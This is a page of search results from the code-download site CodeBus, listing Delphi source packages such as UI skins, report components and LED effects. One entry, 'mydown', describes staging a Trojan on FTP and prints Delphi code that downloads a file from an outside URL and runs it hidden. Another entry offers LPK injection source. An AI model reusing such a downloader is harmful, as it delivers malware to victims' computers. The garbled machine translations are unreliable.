Welcome![Sign In][Sign Up]
Location:
Search - delphi l

Search list

[Documentsdelphi代码编写规范--中科版

Description: 自己写的代码规范,简短有力。 每个项目开头引用 FastMM4。 每个单元开头写上描述、作者、日期等信息 所有New(pointer)的地方IncMem,所有dispose(pointer)的地方DecMem。 所有从TObject继承过来的类改为从TAutoObject继承。 所有从TInterfacedObject继承的接口实现改为从TAutoInterfacedObject或TAutoUserInterfacedObject继承实现。 尽量多的注释。 局域变量非属性变量用"m_"打头命名,局域变量属性变量用"F"打头命名,临时变量用"L"打头命名。
Platform: | Size: 393 | Author: lovemoqi@163.com | Hits:

[Other256色液晶取模软件

Description: 256色液晶取模软件 适用于S3C44b0X A R M处理器的 L C D 256色 字模提取程序,适用于新手使用.也适合于其他支持 256色 l c d,色位为 R(3) G(2) B(2)的 Lcd 控制器,最大支持640*480的液晶屏.-256 color LCD module from the application software in S3C44b0X R A L M processor 256 C D Color Abstraction procedures applicable to the use of newcomers. Also suitable for other support 256-color l c, d, color-R (3) G (2) B (2) Lcd controller supports 640 x 480 LCD screen.
Platform: | Size: 602112 | Author: 郑家福 | Hits:

[ComboBoxSUIPack.v4.40.Delphi.567.BCB.56.Full.Sources-RECOi

Description: SUIPack 為一整套元件,包括編輯元件、資料庫元件和樣式元件,可作出完全不同風格的程式-SUIPack components of the package, including editing component, the component database components and patterns, to make a completely different style of programming
Platform: | Size: 3807232 | Author: 林政利 | Hits:

[CommunicationLPT_DELPHI

Description: 在delphi下,通过并口对外控制设备,包含全部源代码.-In delphi through parallel external control equipment, including all the source code.
Platform: | Size: 256000 | Author: 录音 | Hits:

[OS programGD_2004红外报警控制系统

Description: GD_2004红外报警控制系统 运用的是面向对象开发 这个是一个商业原代码 注意保密好吗? 这个是我去年开发的一个商业软件 已经用在了小区里 使用都很正常的 系统支持MDB和SQL 数据库 注意保密!-GD_2004 infrared alarm system is the use of the object-oriented development is a commercial source Note Italy confidentiality okay? This is my last year, the development of a commercial software has been used in the district are using a normal system support MDB and SQ L confidential database attention!
Platform: | Size: 2230272 | Author: andy | Hits:

[Internet-NetworkNetStats-1.0.5.16-source

Description: Net Statistics is a network monitoring tool. Watch device status, parameters and statistics for incoming and outgoing traffic, and summary info. Traffic diagram shows last few minutes in real-time for easy monitoring of network activity.-Net is a network monitoring too l. Watch device status, parameters and statistics for incoming and out going traffic, and summary info. Traffic diagram shows last fe w minutes in real-time for easy monitoring of ne allow activity.
Platform: | Size: 82944 | Author: 潘峰 | Hits:

[Button controlwinskin

Description: Delphi VclSkin 2.60 VCLSkin is an VCL library that extend Delphi application with skinnable user interface . Unlike other skin component that you must modify source code to build skinnable application, VCLskin can skin existing application using VCL components without source code modification. VclSkin automatically skin kinds of windows in application, include Delphi forms,MDIform and common Windows dialogs (MsgBox,Open/Save,Font,Print), even the Exception MsgBox. Vclskin not only support Delphi standard controls, but also support many third-party component, such as TMS Grid pack, EnLib Grid, Developer Express QuantumGrid. It is an excellent choice for those wanting to skin existing applications. The cool thing is that it uses existing VCL components. Demo version adds a string VclSkin demo on form caption, but allows to test all available functions.-Delphi VclSkin 2.60 VCLSkin is an VCL libra ry that extend Delphi application with skinnab le user interface. Unlike other skin component that you must modify source code to build skinna ble application, VCLskin can skin existing application using VC L components without source code modification . VclSkin automatically skin kinds of windows i n application, include Delphi forms, MDIform and common Windows dialogs (MsgBox. Open/Save, Font, Print) even the Exception MsgBox. Vclskin not only sup port Delphi standard controls, but also support many third-party component, TMS such as Grid pack, EnLib Grid, Developer Express QuantumGrid. It is an excel ent choice for those wanting to skin existing ap plications. The cool thing is that it uses exist ing VCL components. Demo version adds a strin
Platform: | Size: 5241856 | Author: 史旭龙 | Hits:

[Internet-Networkmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1024 | Author: 韩冰 | Hits:

[Multimedia Develop200631

Description: 是一个基于L系统的简单分形图形,用的是DELPHI开发。-L is a system based on a simple fractal graphics, using the Delphi development.
Platform: | Size: 13312 | Author: dany | Hits:

[Hook apiDLLMapFile

Description: notdllHookKey1 Delphi下深入Windows核心编程 DLL及数据共享-notdllHookKey1 Delphi-depth core Windows programming DL L and data sharing
Platform: | Size: 182272 | Author: abc | Hits:

[ActiveX/DCOM/ATLgrid++report

Description: Grid++Report是一款高性能的报表组件(构件/控件),特别适用于管理信息系统(如ERP、进销存、财务等)的报表开发。提供一个具有超强数据展现能力的数据网格(DataGrid)部件,制作各种表格报表非常简便;运行时可通过事件响应使报表与用户交互;针对票据套打进行了专门实现;总之Grid++Report 是制作动态报表的最佳选择。提供可视化报表设计器,设计报表快速简单。Grid++Report除了提供打印功能外,还提供报表的查询显示功能,即如各种数据网格(DataGrid)控件一样显示数据,让报表的查询显示与打印一次实现,既提高开发效率又保持数据的一致性,这也是Grid++Report与其它报表构件的最大区别。Grid++Report 适用于所有支持COM的开发平台,为Visual Basic、Visual C++、Delphi、C++Builder编写了大量例程。采用VC+COM+ATL+WTL开发,运行性能高,重新发布简单、发布文件小且不依赖任何运行时库。-Grid Report is a high-performance components statements (Component/control), particularly applicable to the management of information systems (such as ERP, Invoicing, financial, etc.) to develop the statements. Provide a superior ability to display data in Data Grid (DataGrid) components, statements made various forms is very simple; running through incident response made statements interact with the user; against paper chromatography printing for a special achievement; In short Grid Report is produced dynamic statements for the best choice. Visualization statements for the design, design fast and simple statements. Grid Report addition to providing printing function, it also provided statements to the inquiry showed functions, that is, if the data grid (DataGrid) controls showed that, l
Platform: | Size: 4330496 | Author: wang | Hits:

[Printing programCell_Delphi

Description: Cell_Delphi.rar CELL报表 CELL报表 CELL报表-Cell_Delphi.rar of cells statements of cells statements CEL L statements of cells st atements of cells st atements of cells statements
Platform: | Size: 331776 | Author: 华哥 | Hits:

[Delphi VCLrenshigz

Description: 完善的人事管理 人员职业规划与追踪管理:人员档案、奖惩、考评、调动、培训管理等等 l 多功能,适应面广的工资管理 支持工资多套帐,自定义工资项目明细及其计算公式,支持个人所得税计算,计时、计件工资等管理 l 超强的统计分析、报表打印、数据导出功能 各类常用的人事工资报表:人员档案、人员结构分析……,工资年报,工资条,工资单…… 支持EXCEL导入导出人员档案 l 网络办公及用户个性化设置 本系统支持网络多人同时使用,不同的用户可以根据业务需要设置软件,互不干扰 l 界面友好,图形导航帮您轻松上手 l 强大的组合查询功能,即可获得您需要的特定信息-sound personnel management career planning and tracking management : personnel files, incentives, evaluation, reassignment, Management training etc. l multifunctional, meet a wide range of management support wage wage sets off, Since the definition of wages Details and formula support the personal income tax calculation, time, piecework wages management l Super statistical analysis, statement printing, data export functions commonly used types of personnel wage statements : personnel files, personnel structure analysis ... report wages, wages, wages alone ... Excel Import and Export of support personnel files l network office and individual users of the system set up support networks over the same time using different business users can install software, Noninterference l friendly interfac
Platform: | Size: 4837376 | Author: | Hits:

[Other systemspcn

Description: delphi LED 显示屏用,带串口发送,内容编辑,演示功能-delphi LED display, and with serial transmission, content editing, presentation features
Platform: | Size: 336896 | Author: MR tang | Hits:

[File Operatewindows.lnk

Description: 使用Delphi建立应用程序的快捷方式,同时还有读取桌面路径、开始菜单路径!-Build applications using the Delphi program shortcut, but also read the Desktop path, the path of the Start menu!
Platform: | Size: 12288 | Author: 王风 | Hits:

[Remote ControlWakeUpOnLan

Description: 通过向特定MAC地址发送特定的UDP包,达到远程网络唤醒主机的目的。同一网段可以直接发送,跨网段的需要路尤器广播一下。以前别人有用VC实现的,我这个是自己写的,用DELPHI的VCL组件实现。-Through to specific MAC addresses specific UDP packet sent to a remote network host wake-up purposes. The same network segment can be sent directly, the need for inter-network segment broadcast about the way Mrs. VC useful before others realized this is I wrote it myself, using the VCL components to achieve DELPHI.
Platform: | Size: 183296 | Author: gk | Hits:

[Delphi VCLlpk_delphi

Description: delphi编写LPK注入文件的源代码。。。。写补丁很实用-LPK prepared delphi source code into the document. . . . Patch is very useful to write
Platform: | Size: 23552 | Author: majypro | Hits:

[Delphi VCLlua

Description: Delphi拓展示範,網路上不好找,可以看看,覺得好給點鼓勵啊。-Delphi to expand the model, the network不好找, you can see, feel encouraged to point ah.
Platform: | Size: 6692864 | Author: Peecehood | Hits:

[Delphi VCL57578877LED

Description: 用DELPHI模拟LED屏下的那种文字特效 如: 左移入 右移入 上移入 下移入 左展入 右展入 上展入 下展入 横向展开 横向闭合 纵向展开 纵向闭合 水平百叶窗 垂直百叶窗 闪烁 同时显示-DELPHI simulation LED screen with the kind of text under the effects such as: the left moved to the right on immigration inflow into the right under the Fair moved to the left into the show into the show into the next show started horizontal horizontal vertical closed expand the level of closed vertical blinds vertical blinds flicker at the same time show
Platform: | Size: 5120 | Author: jxjjljf | Hits:

[Delphi VCLLed

Description: 用DELPHI模拟LED屏下的那种文字特效怎么做啊? 如: 左移入 右移入 上移入 下移入 左展入 右展入 上展入 下展入 横向展开 横向闭合 纵向展开 纵向闭合 水平百叶窗 垂直百叶窗 闪烁 同时显示-DELPHI simulation of LED screen with the kind of text effects, under how to do ah? Such as: immigration, on the left moved to the right shifted into the right under the Fair moved to the left into the Exhibition Exhibition Exhibition entry into the next horizontal start vertical launch horizontal closed level of the vertical blinds vertical blinds closed while blinking display
Platform: | Size: 14336 | Author: jxjjljf | Hits:
« 12 3 »

CodeBus www.codebus.net